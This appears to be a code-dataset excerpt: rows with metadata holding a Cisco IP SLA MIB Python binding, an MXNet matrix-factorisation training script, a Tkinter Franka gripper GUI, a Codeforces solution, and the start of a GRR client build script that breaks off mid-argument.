self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
| en | 0.665907 | CISCO_IPSLA_ECHO_MIB This MIB module defines the templates for IP SLA operations of ICMP echo, UDP echo and TCP connect. The ICMP echo operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken between sending an ICMP echo request message to the destination and receiving an ICMP echo reply. The UDP echo operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken between sending an UDP echo request message to the destination and receiving an UDP echo reply. The TCP connect operation measures end\-to\-end response time between a Cisco router and any IP enabled device by computing the time taken to perform a TCP connect operation. .. attribute:: cipslaicmpechotmpltable A table that contains ICMP echo template definitions **type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>` .. attribute:: cipslaudpechotmpltable A table that contains UDP echo template specific definitions **type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>` .. attribute:: cipslatcpconntmpltable A table that contains TCP connect template specific definitions **type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>` A table that contains ICMP echo template definitions. .. attribute:: cipslaicmpechotmplentry A row entry representing an IPSLA ICMP echo template **type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>` A row entry representing an IPSLA ICMP echo template. .. attribute:: cipslaicmpechotmplname (key) This field is used to specify the ICMP echo template name **type**\: str **length:** 1..64 .. attribute:: cipslaicmpechotmpldescription This field is used to provide description for the ICMP echo template **type**\: str **length:** 0..128 .. attribute:: cipslaicmpechotmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: cipslaicmpechotmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslaicmpechotmpltimeout Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. attribute:: cipslaicmpechotmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslaicmpechotmplreqdatasize This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value **type**\: int **range:** 0..16384 **units**\: octets .. attribute:: cipslaicmpechotmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslaicmpechotmplvrfname This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation **type**\: str **length:** 0..32 .. attribute:: cipslaicmpechotmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslaicmpechotmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslaicmpechotmplhistbuckets The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslaicmpechotmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>` .. attribute:: cipslaicmpechotmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslaicmpechotmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslaicmpechotmpldistinterval The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslaicmpechotmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslaicmpechotmplrowstatus The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaIcmpEchoTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 A table that contains UDP echo template specific definitions. .. attribute:: cipslaudpechotmplentry A row entry representing an IPSLA UDP echo template **type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>` A row entry representing an IPSLA UDP echo template. .. attribute:: cipslaudpechotmplname (key) A string which specifies the UDP echo template name **type**\: str **length:** 1..64 .. attribute:: cipslaudpechotmpldescription A string which provides description to the UDP echo template **type**\: str **length:** 0..128 .. attribute:: cipslaudpechotmplcontrolenable If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router **type**\: bool .. attribute:: cipslaudpechotmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: cipslaudpechotmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslaudpechotmplsrcport This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system **type**\: int **range:** 0..65535 .. attribute:: cipslaudpechotmpltimeout Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. attribute:: cipslaudpechotmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslaudpechotmplreqdatasize This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value **type**\: int **range:** 4..1500 **units**\: octets .. attribute:: cipslaudpechotmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslaudpechotmplvrfname This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation **type**\: str **length:** 0..32 .. attribute:: cipslaudpechotmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslaudpechotmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslaudpechotmplhistbuckets The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslaudpechotmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>` .. attribute:: cipslaudpechotmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslaudpechotmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslaudpechotmpldistinterval The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslaudpechotmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslaudpechotmplrowstatus The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaUdpEchoTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 A table that contains TCP connect template specific definitions. .. attribute:: cipslatcpconntmplentry A row entry representing an IPSLA TCP connect template **type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>` A row entry representing an IPSLA TCP connect template. .. attribute:: cipslatcpconntmplname (key) A string which specifies the TCP connect template name **type**\: str **length:** 1..64 .. attribute:: cipslatcpconntmpldescription A string which provides description for the TCP connect template **type**\: str **length:** 0..128 .. attribute:: cipslatcpconntmplcontrolenable If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router **type**\: bool .. attribute:: cipslatcpconntmplsrcaddrtype An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object **type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>` .. attribute:: cipslatcpconntmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslatcpconntmplsrcport This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system **type**\: int **range:** 0..65535 .. attribute:: cipslatcpconntmpltimeout Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. attribute:: cipslatcpconntmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslatcpconntmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslatcpconntmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslatcpconntmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslatcpconntmplhistbuckets The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslatcpconntmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>` .. attribute:: cipslatcpconntmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslatcpconntmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslatcpconntmpldistinterval The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslatcpconntmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslatcpconntmplrowstatus The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaTcpConnTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 | 1.838984 | 2 |
example/model-parallel/matrix_factorization/train.py | tkameyama/incubator-mxnet | 1 | 8051 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Creating a module by passing group2ctxs attribute which maps
# the ctx_group attribute to the context assignment
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Creating a module by passing group2ctxs attribute which maps
# the ctx_group attribute to the context assignment
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
| en | 0.80025 | # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # arg parser # prepare dataset and iterators # construct the model # construct the module # map the ctx_group attribute to the context assignment # Creating a module by passing group2ctxs attribute which maps # the ctx_group attribute to the context assignment # the initializer used to initialize the parameters # the parameters for the optimizer constructor # use MSE as the metric # start training | 2.117392 | 2 |
scripts/libfranka_gui_gripper_run.py | nbfigueroa/franka_interactive_controllers | 6 | 8052 | #!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
| #!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
| fr | 0.221828 | #!/usr/bin/env python3 | 3.106617 | 3 |
codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 0 | 8053 | <filename>codeforces.com/1669F/solution.py
for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
| <filename>codeforces.com/1669F/solution.py
for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
| none | 1 | 3.37836 | 3 |
|
client/client_build.py | patriotemeritus/grr | 1 | 8054 | #!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
